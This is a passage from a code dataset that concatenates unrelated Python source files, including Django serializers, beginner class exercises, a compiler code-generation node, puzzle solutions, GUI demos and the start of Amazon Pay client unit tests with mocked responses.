'updated_time')\n\n\nclass 
AnimeOfSubscriptionSerializer(serializers.ModelSerializer):\n seasons = SeasonOfSubscriptionSerializer(many=True)\n\n class Meta:\n model = Anime\n fields = ('id', 'aid', 'name', 'description', 'is_end', 'episode', 'poster_link', 'updated_time', 'seasons')\n\n\n# Subscription serializers\nclass SubscriptionSerializer(serializers.ModelSerializer):\n anime = AnimeOfSubscriptionSerializer()\n\n class Meta:\n model = Subscription\n fields = ('id', 'anime', 'currently_watched', 'status', 'season')\n\n\nclass SubscriptionCreateSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n\n\nclass SubscriptionUpdateSerializer(serializers.ModelSerializer):\n def get_fields(self):\n fields = super(SubscriptionUpdateSerializer, self).get_fields()\n # filter seasons of the anime\n if not self.instance:\n fields['season'].queryset = None\n return fields\n fields['season'].queryset = Season.objects.filter(anime=self.instance.anime)\n return fields\n\n class Meta:\n model = Subscription\n fields = ('id', 'anime', 'currently_watched', 'status', 'season')\n read_only_fields = ('user', 'anime')\n\n\n# Track Serializer\nclass TrackSerializer(serializers.ModelSerializer):\n class Meta:\n model = Track\n fields = ('subscription', 'date_watched', 'status', 'message')\n\n\n# User serializers\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id', 'date_joined', 'is_staff', 'last_login', 'email', 'username')\n read_only_fields = ('date_joined', 'is_staff', 'last_login', 'username')\n\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n track = TrackSerializer(many=True)\n\n class Meta:\n model = User\n fields = ('id', 'date_joined', 'is_staff', 'last_login', 'username', 'track')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('email', 'username', 'password')\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('password', )\n\n\n# Others\nclass SearchSerializer(serializers.Serializer):\n aid = serializers.IntegerField()\n season_id = serializers.IntegerField()\n name = serializers.CharField()\n description = serializers.CharField()\n episode = serializers.IntegerField()\n poster_link = serializers.URLField()\n updated_time = serializers.DateTimeField()","repo_name":"RicterZ/AnimeReminder","sub_path":"api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"869360823","text":"class BankAccount:\n\n def __init__(self, in_name, in_number, in_balance):\n if D:\n print(\"name = {} \\nnumber={} \\nbalance = {}\".format(in_name, in_number, in_balance))\n\n self.balance = in_balance\n self.name = in_name\n self.number = in_number\n\n def withdraw(self, in_amount):\n if D:\n print(\"current balance = {} \\nwithdrawal amount = {}\".format(self.balance, in_amount))\n self.balance -= in_amount # reason for not doing self.amount = in_amount\n \n if D:\n print(\"after withdrawal self.balance = \", self.balance)\n return self.balance\n\n def deposit(self, in_amount):\n if D:\n print(\"in_amount =\", in_amount)\n self.balance += in_amount\n if D:\n print(\"d2) self.balance =\", self.balance)\n\n return self.balance\n\nclass SavingAccount(BankAccount):\n\n def __init__(self, in_name, in_number, in_balance, in_interest_rate):\n if D:\n print(\"\\nsa_i)name = \", in_name)\n print(\"sa_i) number = \", in_number)\n print(\"sa_i) balance =\", in_balance)\n
print(\"sa_i)interest_rate = \", in_interest_rate)\n\n super().__init__(in_name, in_number, in_balance)\n self.in_interest_rate = in_interest_rate\n\n def set_interest_rate(self, in_interest_rate):\n self.in_interest_rate = in_interest_rate\n if D:\n print(\"set_int) self.interest_rate =\", self.in_interest_rate)\n\n def get_interest_rate(self):\n if D:\n print(\"get_int) self.interest_rate =\", self.in_interest_rate)\n return self.in_interest_rate\n \n def add_interest(self):\n self.balance += self.balance * self.in_interest_rate\n if D:\n print(\"add_int) self.balance =\", self.balance)\n\nclass CheckingAccount(BankAccount):\n\n def __init__(self, in_name, in_number, in_balance):\n if D:\n print(\"\\ncai_1) name = {}, number = {}, balance = {}\" .format(in_name, in_number, in_balance))\n super().__init__(in_name, in_number, in_balance)\n\n\n self.withdraw_charge = 10000\n if D:\n print(\"\\ncai_2) 수표 발행 수수료 = \", self.withdraw_charge)\n\n def withdraw(self, in_amount):\n if D:\n print(\"\\ncaw) amount =\", in_amount)\n\n return BankAccount.withdraw(self, in_amount + self.withdraw_charge)\n\n def deposit(self, in_amount):\n if D:\n print(\"\\ncade) amount = \", in_amount)\n return BankAccount.deposit(self, in_amount)\n\nclass Debugging_option:\n\n def __init__(self, option):\n self.debug_option = option\n\n def in_option(self):\n self.debug_option = input(\"Debugging을 원하시나요? (y or n): \")\n return self.debug_option\n\n#main\ndebug = Debugging_option(\"n\")\n\ndep_option = debug.in_option()\n\nif dep_option == \"y\":\n D = True\n print(\"1) deb_option =\", dep_option)\nelse:\n D = False\n\nif D:\n print(\"2) SavingAccount class의 객체 생성\")\nsavings_acc = SavingAccount(\"김국민\", 20213011, 10000, 0.05)\n\nsavings_acc.get_interest_rate()\nsavings_acc.add_interest()\nprint(\"3)저축 예금의 잔액 = \", savings_acc.balance)\n\nif D:\n print(\"\\n4) SavingAccount 금리 변경 인하 : 0.05% --> 0.03%\")\n\nsavings_acc.set_interest_rate(0.03)\nsavings_acc.get_interest_rate()\nsavings_acc.add_interest()\nprint(\"3) 저축예금의 잔액 = \",savings_acc.balance)\n\n\n\n\n","repo_name":"clark1015/python_study","sub_path":"과소사/module.practice/class/personClass.py","file_name":"personClass.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19057386940","text":"from ..Semantic.c3d_generator import C3DGenerator\nfrom ..Semantic.exception import CompilerException\nfrom ..Semantic.symbol_table import SymbolTable\nfrom ..Abstract.abstract import Abstract\nfrom ..Instruction.reserved_return import ReservedReturn\nfrom ..Instruction.reserved_continue import ReservedContinue\nfrom ..Instruction.reserved_break import ReservedBreak\n\nclass IfSentence(Abstract):\n\n def __init__(self, condition, ifBlock, elseBlock, elseIfBlock, line, column):\n super().__init__(line, column)\n self.condition = condition\n self.ifBlock = ifBlock\n self.elseBlock = elseBlock\n self.elseIfBlock = elseIfBlock\n \n\n def execute(self, tree, table):\n callGenerator=C3DGenerator()\n generator=callGenerator.getGenerator()\n generator.addNewComment('Start conditional if')\n condition = self.condition.execute(tree, table) # True o False\n if isinstance(condition, CompilerException) : return condition\n\n if condition.getType() == 'boolean':\n generator.defineLabel(condition.getLabelTrue())\n entorn = SymbolTable(table) #New entorn\n for instruction in self.ifBlock:\n entorn.labelBreak = table.labelBreak#exit of all if\n entorn.labelContinue = 
table.labelContinue#continue with the if\n entorn.labelReturn = table.labelReturn#return data\n valueInstruction = instruction.execute(tree, entorn)#execute the instruction\n if isinstance(valueInstruction, CompilerException):\n tree.setExceptions(valueInstruction)\n if isinstance(valueInstruction, ReservedBreak):\n if table.labelBreak != '':\n generator.addGotoLabel(table.labelBreak)#goto{table.labelBreak}\n else:\n leave = generator.addNewLabel()#add new label (leave)\n generator.addGotoLabel(leave)#goto{leave(the new label)}\n generator.defineLabel(valueInstruction.getLabel())#L(valueInstruction.label):\n generator.defineLabel(leave)#Lleave:\n return CompilerException(\"Semantico\", \"Error: Break outside of the instance\", self.line, self.column)\n if isinstance(valueInstruction, ReservedContinue):\n if table.labelContinue != '':\n generator.addGotoLabel(table.labelContinue)#goto{table.labelContinue}\n else:\n gotoContinue = generator.addNewLabel()#add new label (gotocontinue)\n generator.addGotoLabel(gotoContinue)#goto{gotoContinue}\n generator.defineLabel(condition.getLabelFalse())#label condition.labelFalse\n generator.defineLabel(gotoContinue)#gotoContinue:\n return CompilerException(\"Semantico\", \"Error: Continue outside of the instance\", self.line, self.column)\n if isinstance(valueInstruction, ReservedReturn):#if it is an instance of return\n if entorn.labelReturn != '':\n generator.addNewComment('Return data for the function')\n if valueInstruction.getLabelTrue() == '':#verify getLabel; if it is '' set the stack with valueInstruction\n generator.setStack('P', valueInstruction.getValue())\n generator.addGotoLabel(entorn.labelReturn)#Add gotolabel return label\n else:\n generator.defineLabel(valueInstruction.getLabelTrue())#if it exists, define my label true\n generator.setStack('P', '1')#set the stack in the position 1\n generator.addGotoLabel(entorn.labelReturn)#return label and define label to label false\n generator.defineLabel(valueInstruction.getLabelFalse())\n generator.setStack('P', '0')\n generator.addGotoLabel(entorn.labelReturn)#set stack =0 and goto label to return label\n generator.addNewComment('End return data for the function')\n #create label to leave\n leave = generator.addNewLabel()\n generator.addGotoLabel(leave)\n generator.defineLabel(condition.getLabelFalse())\n if self.elseBlock != None:\n entorn = SymbolTable(table) #New environment\n for instruction in self.elseBlock:#instructions for the else block\n entorn.labelBreak = table.labelBreak#exit of all else\n entorn.labelContinue = table.labelContinue#continue with the else\n entorn.labelReturn = table.labelReturn#return data\n valueInstruction = instruction.execute(tree, entorn)#execute the instruction\n if isinstance(valueInstruction, CompilerException):\n tree.setExceptions(valueInstruction)\n if isinstance(valueInstruction, ReservedReturn):#if it is an instance of reserved return\n generator.addNewComment('Return data for the function')\n if valueInstruction.getLabelTrue() == '':#if labeltrue ='' set the stack with instruction value\n generator.setStack('P', valueInstruction.getValue())\n generator.addGotoLabel(entorn.labelReturn)#add goto label to return label\n else:\n generator.defineLabel(valueInstruction.getLabelTrue())#define label with instruction for label true\n generator.setStack('P', '1')#set the stack with 1\n generator.addGotoLabel(entorn.labelReturn)#add goto label to return label\n generator.defineLabel(valueInstruction.getLabelFalse())#define\n generator.setStack('P', '0')#set the stack to 0 and goto label to return 
label\n generator.addGotoLabel(entorn.labelReturn)\n generator.addNewComment('End return data for the function')\n elif self.elseIfBlock != None:#obtain instruction for block else if\n resultElseIf = self.elseIfBlock.execute(tree,table)\n if isinstance(resultElseIf, CompilerException): return resultElseIf\n generator.defineLabel(leave)#define my lave for leave, L#:\n generator.addNewComment('End conditional if')\n\n","repo_name":"MarianoFrancisco/PyTypeCraft","sub_path":"backendc3d/src/Instruction/if_declaration.py","file_name":"if_declaration.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44891791866","text":"# Autor: Jakub Svajka\n# Datum: 22.3.2020\n\nimport DABplus\nimport fileHandler\nimport subprocess\n\n# Getting frequency\nf = fileHandler.getConfig()[0]\n# Getting corresponding channel\nch = fileHandler.DABchannels[f]\n\n# Loading kernel module\nsdr = DABplus.RtlSdr()\n# Check bandwidth before start of welle-cli\nbandwidth = DABplus.checkBandwidth(sdr, f)\n# Unloading kernel module\nsdr.close()\n\nif True:\n \n range = 1000\n if (1536000 - range < bandwidth < 1536000 + range):\n cmd = \"nohup ~/welle-cli -c \" + ch + \" >/dev/null 2>&1 &\"\n # Executing command - oppening pipe\n subprocess.run(cmd, shell=True)\n else:\n print(\"Bandwidth is not in the range. Aborting!\")\nelse:\n fileHandler.wFile(\"/home/pi/DABreceiver/python/bandwidth.txt\", bandwidth)","repo_name":"straker741/DABreceiver","sub_path":"python/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20226829474","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n\ndef donothing():\n print(\"doing nothing\")\n\n#-------------------Main Menu-------------------#\n\nmenu = Menu(root)\nroot.config(menu=menu)\n\nsubMenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=subMenu)\nsubMenu.add_command(label=\"new project\", command=donothing)\nsubMenu.add_command(label=\"one project\", command=donothing)\nsubMenu.add_separator()\nsubMenu.add_command(label=\"separator here\", command=donothing)\nsubMenu.add_command(label=\"Exit\", command=donothing)\n\neditMenu = Menu(menu)\nmenu.add_cascade(label=\"Edit\",menu=editMenu)\neditMenu.add_command(label=\"undo\", command=donothing)\n\n#--------------------Toolbar--------------------#\n\ntoolbar = Frame(root, bg=\"blue\")\n\ninsertBnt = Button(toolbar, text=\"Insert Image\", command=donothing)\ninsertBnt.pack(side=\"left\", padx=2, pady=2)\nprintBtn = Button(toolbar, text=\"Print\", command=donothing)\nprintBtn.pack(side=\"left\", padx=2, pady=2)\n\ntoolbar.pack(side=\"top\", fill=\"x\")\n\n#--------------------StatusBar--------------------#\n\nstatus = Label(root, text=\"Preparing to do nothing\", bd=\"1\", relief=\"sunken\", anchor=\"w\")\nstatus.pack(side=\"bottom\", fill=\"x\")\n\n#-------------------Message Box-------------------#\n\n\nmessagebox.showinfo('Windows Title', 'I don\\'t have any fun fact...!')\n\nanswer = messagebox.askquestion('First Question', 'Click anything Yes OR No ?')\n\nif answer == 'yes':\n print(\"YES\")\nif answer == 'no':\n 
print(\"NO\")\n\n\n\nroot.mainloop()\n","repo_name":"KalpIC/Tkinter_practice","sub_path":"venv/tkinter_frame_for_all.py","file_name":"tkinter_frame_for_all.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37336316083","text":"from kunquat.tracker.ui.qt import *\n\nfrom .connectionseditor import ConnectionsEditor\nfrom .keyboardmapper import KeyboardMapper\nfrom .saverwindow import SaverWindow\nfrom .updater import Updater\n\n\nclass ConnectionsWindow(Updater, SaverWindow):\n\n def __init__(self):\n super().__init__()\n self._ui_model = None\n self._conns_editor = ConnectionsEditor()\n\n self._keyboard_mapper = KeyboardMapper()\n\n self.add_to_updaters(self._conns_editor, self._keyboard_mapper)\n\n self.setWindowTitle('Connections')\n\n v = QVBoxLayout()\n v.setContentsMargins(0, 0, 0, 0)\n v.setSpacing(0)\n v.addWidget(self._conns_editor)\n self.setLayout(v)\n\n def closeEvent(self, event):\n event.ignore()\n visibility_mgr = self._ui_model.get_visibility_manager()\n visibility_mgr.hide_connections()\n\n def sizeHint(self):\n return QSize(800, 600)\n\n def keyPressEvent(self, event):\n if not self._keyboard_mapper.process_typewriter_button_event(event):\n super().keyPressEvent(event)\n\n def keyReleaseEvent(self, event):\n if not self._keyboard_mapper.process_typewriter_button_event(event):\n event.ignore()\n\n\n","repo_name":"Jasu/kunquat","sub_path":"kunquat/tracker/ui/views/connectionswindow.py","file_name":"connectionswindow.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"24681482921","text":"class tanc:\r\n def __init__(self, tanc, lany, fiu):\r\n self.tanc=tanc\r\n self.lany=lany\r\n self.fiu=fiu\r\n \r\n def __str__(self):\r\n return \"Tánc: {}, Lány: {}, Fiú: {}.\".format(self.tanc,self.lany,self.fiu)\r\n\r\n def isVilma(self):\r\n return self.lany==\"Vilma\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nf=open(\"tancrend.txt\")\r\n\r\nsorok=[]\r\n\r\n#2.mego\r\n\r\ntancok2=[]\r\ntemp=[]\r\n\r\nfor e in f:\r\n sorok.append(e.strip())\r\n #2.mego\r\n if len(temp)<3:\r\n temp.append(e)\r\n else:\r\n tancok2.append(tanc(temp[0],temp[1],temp[2]))\r\nf.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#1.mego\r\ntancok=[]\r\n\r\nfor i in range(len(sorok)//3):\r\n tancc=sorok[i*3]\r\n lany=sorok[i*3+1]\r\n fiu=sorok[i*3+2]\r\n tancok.append(tanc(tancc, lany, fiu))\r\n\r\nprint(tancok)\r\n\r\n\r\nprint(\"2. 
feladat\")\r\nprint(\"Első tánc: {}, utolsó tánc: {}\".format(tancok[0].tanc, tancok[-1].tanc))\r\n\r\ndb=0\r\nfor egyTanc in tancok:\r\n if egyTanc.tanc==\"samba\":\r\n db+=1\r\n\r\nprint(\"3.feladat\")\r\nprint(\"Ennyi pár mutatta be a sambát: {}\".format(db))\r\n\r\n\r\nprint(\"4.feladat\")\r\nprint(\"Vilma ezekben szerepelt:\")\r\n\r\nfor egyTanc in tancok:\r\n if egyTanc.isVilma():\r\n print(egyTanc.tanc)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"flowerjazmin/python2022","sub_path":"2023.05/latin_tanc/tanciskola.py","file_name":"tanciskola.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121525266","text":"# https://atcoder.jp/contests/past202104-open/submissions/22052173\n# G - 一日一歩\nimport sys\nfrom heapq import *\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nMOD = 10 ** 9 + 7\n\n\nclass UnionFind:\n def __init__(self, n):\n self.n = n\n self.par = [-1] * n\n self.wei = [0] * n\n\n def find(self, x):\n if self.par[x] < 0:\n return x\n else:\n y = self.find(self.par[x])\n self.wei[x] += self.wei[self.par[x]]\n self.par[x] = y\n return y\n\n def union(self, x, y, w=0):\n w += self.weight(x) - self.weight(y)\n x = self.find(x)\n y = self.find(y)\n if x == y:\n return False\n if self.par[x] > self.par[y]:\n x, y = y, x\n w *= -1\n self.par[x] += self.par[y]\n self.par[y] = x\n self.wei[y] = w\n return True\n\n def same(self, x, y):\n return self.find(x) == self.find(y)\n\n def size(self, x):\n return -self.par[self.find(x)]\n\n def weight(self, x):\n self.find(x)\n return self.wei[x]\n\n def diff(self, x, y):\n return self.weight(y) - self.weight(x)\n\n def kruskal(self, edge):\n edge.sort()\n cost_sum = 0\n for cost, node1, node2 in edge:\n if not self.same(node1, node2):\n cost_sum += cost\n self.union(node1, node2)\n return cost_sum\n\n\ndef solve():\n n, m, q = map(int, input().split())\n edge = [[] for _ in range(n)]\n for _ in range(m):\n a, b, c = map(int, input().split())\n edge[a - 1].append([c, b - 1])\n edge[b - 1].append([c, a - 1])\n X = list(map(int, input().split()))\n\n uf = UnionFind(n)\n que = []\n for d, u in edge[0]:\n heappush(que, (d, u))\n\n for i in range(q):\n x = X[i]\n tmp = []\n while que and que[0][0] <= x:\n _, v = heappop(que)\n if not uf.same(0, v):\n uf.union(0, v)\n for d, u in edge[v]:\n if not uf.same(0, u):\n tmp.append((d, u))\n for d, u in tmp:\n heappush(que, (d, u))\n print(uf.size(0))\n\n\nif __name__ == '__main__':\n solve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/PAST006/PAST006_G.py","file_name":"PAST006_G.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19696684196","text":"from collections import defaultdict\n\ndef max_k_sum_pairs(nums, K):\n count = defaultdict(int)\n pair_count = 0\n\n for num in nums:\n complement = K - num\n\n if count[complement] > 0:\n pair_count += count[complement]\n count[complement] -= 1\n\n count[num] += 1\n\n return pair_count\n\narray = [1, 2, 3, 4, 5]\nK = 6\nresult = max_k_sum_pairs(array, K)\nprint(result) ","repo_name":"AbhiGol/Leet-Code","sub_path":"Python/42. 
array = [1, 2, 3, 4, 5]\nK = 6\nresult = max_k_sum_pairs(array, K)\nprint(result) \n","repo_name":"AbhiGol/Leet-Code","sub_path":"Python/42. Max Number of K-Sum Pairs/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2864816197","text":"from collections import defaultdict, deque\nfrom enum import Enum\nfrom intcode import Intcode\n\nwith open(\"../input/day17.txt\", 'r') as inputFile:\n splitData = inputFile.read().split(\",\")\n data = [int(x) for x in splitData]\n\n\n\nclass Direction(Enum):\n N = 1\n S = 2\n W = 3\n E = 4\n\n def getOpposite(self):\n opposite = [\n Direction.S,\n Direction.N,\n Direction.E,\n Direction.W,\n ]\n return opposite[self.value - 1]\n\n def getNext(self):\n nextVal = [\n Direction.E,\n Direction.W,\n Direction.N,\n Direction.S\n ]\n return nextVal[self.value - 1]\n\nclass Point:\n x: int\n y: int\n\n def __init__(self, x:int, y:int):\n self.x = x\n self.y = y\n\n @classmethod\n def Create(cls, point):\n return Point(point.x, point.y)\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __add__(self, other):\n return Point(x=(self.x+other.x), y=(self.y+other.y))\n\n def __hash__(self):\n return hash(self.x) ^ hash(self.y)\n\n def __repr__(self):\n return f\"Point(x={self.x}, y={self.y})\"\n\n def move(self, dir: Direction):\n movement = {\n Direction.N: Point(x=0, y=-1),\n Direction.S: Point(x=0, y=1),\n Direction.W: Point(x=-1, y=0),\n Direction.E: Point(x=1, y=0),\n }\n return self + movement[dir]\n\n def getAllSurroundingPos(self):\n return [self.move(x) for x in (Direction.N, Direction.S, Direction.W, Direction.E)]\n\n def getDirToPoint(self, other):\n # directions follow move(): E increases x, S increases y\n if self.x < other.x:\n return Direction.E\n elif self.x > other.x:\n return Direction.W\n elif self.y < other.y:\n return Direction.S\n else:\n return Direction.N\n\n def getManhattanDist(self, other):\n return abs(self.x - other.x) + abs(self.y - other.y)\n\nclass GridType(Enum):\n UNKNOWN = 0\n SCAFFOLD = 1\n EMPTY = 2\n ROBOT = 3\n\nrunner = Intcode(verbose=False)\nrunner.initProgram(data, stallOnOutput=True)\nrunner.runProgram()\n\ngrid = {}\nstartPos = Point(0, 0)\n\ncurrentX = 0\ncurrentY = 0\n\n# the camera emits ASCII codes: 35 ('#') scaffold, 46 ('.') empty, 10 newline; anything else is the robot\nwhile runner.eop is False:\n assert(runner.readOutput)\n output = runner.retVal\n if output == 35:\n grid[Point.Create(startPos)] = GridType.SCAFFOLD.value\n startPos = startPos.move(Direction.E)\n elif output == 46:\n grid[Point.Create(startPos)] = GridType.EMPTY.value\n startPos = startPos.move(Direction.E)\n elif output == 10:\n startPos = Point(0, startPos.y + 1)\n else:\n grid[Point.Create(startPos)] = GridType.ROBOT.value\n startPos = startPos.move(Direction.E)\n runner.runProgram()\n\nminX = min([point.x for point in grid.keys()])\nmaxX = 
max([point.x for point in grid.keys()])\nminY = min([point.y for point in grid.keys()])\nmaxY = max([point.y for point in grid.keys()])\n\ndef printGrid(grid: defaultdict):\n strings = [\n ' ',\n '#',\n '.',\n 'X'\n ]\n for y in range(minY, maxY+1):\n for x in range(minX, maxX+1):\n print(strings[grid[Point(x, y)]], end='')\n print()\n print()\n print()\n\n# Part 1\nintersections = set()\npos: Point\ntype: GridType\nfor pos, type in grid.items():\n if type == GridType.SCAFFOLD.value or type == GridType.ROBOT.value:\n surrounding = pos.getAllSurroundingPos()\n if all([True if x in grid and (grid[x] == GridType.SCAFFOLD.value or grid[x] == GridType.ROBOT.value) else False for x in surrounding]):\n intersections.add(pos)\n\nprint(\"Part1:\", sum([pos.x * pos.y for pos in intersections]))\nprintGrid(grid)\n\n# Part 2\n# NOTE: This is not a generic solver.\npart2 = list(data)\npart2[0] = 2\n\nA = \"L,12,L,10,R,8,L,12\\n\"\nB = \"L,10,R,12,R,8\\n\"\nC = \"R,8,R,10,R,12\\n\"\nMain = \"A,C,A,C,B,B,C,A,C,B\\n\"\n\ninputStream = [ord(x) for x in Main] + [ord(x) for x in A] + [ord(x) for x in B] + [ord(x) for x in C] + [ord('n'), ord('\\n')]\nrunner.initProgram(program=part2, inputStream=inputStream)\nrunner.runProgram()\nassert(runner.eop)\nprint(\"Part2:\", runner.retVal)","repo_name":"pantaryl/adventofcode","sub_path":"2019/src/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74905354065","text":"# Return all subsets of nums\nnums = [1,2,3]\n\n# Subsets via DFS over the decision tree\nresult = []\ndef dfs(index, path): \n # record the current path every time\n result.append(path)\n # DFS while extending the path\n for i in range(index, len(nums)):\n dfs(i+1, path+ [nums[i]])\ndfs(0,[])\nprint(sorted(result,key=len))\n\n\n\n# Subsets via itertools.combinations\n# import itertools\n# result = []\n# for i in range(0, len(nums)+1):\n# line = (list(map(list, itertools.combinations(nums,i))))\n# for l in line:\n# result.append(l)\n# print(sorted(result,reverse=True, key=len))\n\n","repo_name":"limnyn/python_codingtest","sub_path":"Algorithm_Interview/37_부분집합.py","file_name":"37_부분집합.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27206061297","text":"import os\nimport sys\nimport json\nimport platform\nimport unittest\nimport xml.etree.ElementTree as et\nimport amazon_pay.ap_region as ap_region\nimport amazon_pay.version as ap_version\nfrom unittest.mock import Mock, patch\nfrom amazon_pay.client import AmazonPayClient\nfrom amazon_pay.payment_request import PaymentRequest\nfrom amazon_pay.payment_response import PaymentResponse, PaymentErrorResponse\nfrom symbol import parameters\n\nclass AmazonPayClientTest(unittest.TestCase):\n\n def setUp(self):\n self.maxDiff = None\n self.mws_access_key = 'mws_access_key'\n self.mws_secret_key = 'mws_secret_key'\n self.merchant_id = 'merchant_id'\n self.service_version = '2013-01-01'\n self.mws_endpoint = \\\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/{}'.format(\n self.service_version)\n\n self.client = AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='na',\n currency_code='USD')\n\n self.request = PaymentRequest(\n params={'test': 'test'},\n config={'mws_access_key': self.mws_access_key,\n 'mws_secret_key': self.mws_secret_key,\n 'api_version': 
'2013-01-01',\n 'merchant_id': self.merchant_id,\n 'mws_endpoint': self.mws_endpoint,\n 'headers': {'test': 'test'},\n 'handle_throttle': True})\n\n self.response = PaymentResponse('<test>الفلانية فلا</test>')\n self.supplementary_data = '{\"AirlineMetaData\" : {\"version\": 1.0, \"airlineCode\": \"PAX\", \"flightDate\": \"2018-03-24T20:29:19.22Z\", \"departureAirport\": \"CDG\", \"destinationAirport\": \"LUX\", \"bookedLastTime\": -1, \"classOfTravel\": \"F\", \"passengers\": {\"numberOfPassengers\": 4, \"numberOfChildren\": 1, \"numberOfInfants\": 1 }}, \"AccommodationMetaData\": {\"version\": 1.0, \"startDate\": \"2018-03-24T20:29:19.22Z\", \"endDate\": \"2018-03-24T20:29:19.22Z\", \"lengthOfStay\": 5, \"numberOfGuests\": 4, \"class\": \"Standard\", \"starRating\": 5, \"bookedLastTime\": -1 }, \"OrderMetaData\": {\"version\": 1.0, \"numberOfItems\": 3, \"type\": \"Digital\" }, \"BuyerMetaData\": {\"version\" : 1.0, \"isFirstTimeCustomer\" : true, \"numberOfPastPurchases\" : 2, \"numberOfDisputedPurchases\" : 3, \"hasOpenDispute\" : true, \"riskScore\" : 0.75 }}'\n\n def mock_requests_post(self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<GetBillingAgreementDetailsResponse>\\\n <GetBillingAgreementDetailsResult><BillingAgreementDetails>\\\n <BillingAgreementStatus><State>Draft</State>\\\n </BillingAgreementStatus></BillingAgreementDetails>\\\n </GetBillingAgreementDetailsResult>\\\n </GetBillingAgreementDetailsResponse>'\n mock_response.status_code = 200\n return mock_response\n\n def mock_requests_500_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 500\n return mock_response\n\n def mock_requests_generic_error_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 502\n return mock_response\n\n def mock_requests_503_post(\n self, url, data=None, headers=None, verify=False):\n mock_response = Mock()\n mock_response.text = '<error>test</error>'\n mock_response.status_code = 503\n return mock_response\n\n def mock_get_login_profile(self, url, headers, params, verify):\n mock_response = Mock()\n mock_response.json.return_value = {\"aud\": \"client_id\"}\n mock_response.status_code = 200\n return mock_response\n\n def test_sandbox_setter(self):\n self.client.sandbox = False\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments/2013-01-01')\n self.client.sandbox = True\n self.assertEqual(\n self.client._mws_endpoint,\n 'https://mws.amazonservices.com/OffAmazonPayments_Sandbox/2013-01-01')\n \n def test_sanitize_response_data(self):\n current_file_dir = os.path.dirname(__file__)\n test_file_path = os.path.join(current_file_dir, \"log.txt\")\n f = open(test_file_path, \"r\")\n source_text = f.read()\n f.close()\n text = self.request._sanitize_response_data(source_text)\n test_file_path = os.path.join(current_file_dir, \"sanlog.txt\")\n f = open(test_file_path, \"r\")\n san_text = f.read()\n f.close()\n self.assertEqual(text, san_text)\n\n def test_region_exception(self):\n with self.assertRaises(KeyError):\n AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='should_throw_exception',\n currency_code='test')\n\n def test_set_endpoint(self):\n 
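# setUp built the client with sandbox=True, so _set_endpoint should rebuild the sandbox URL here.\n 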
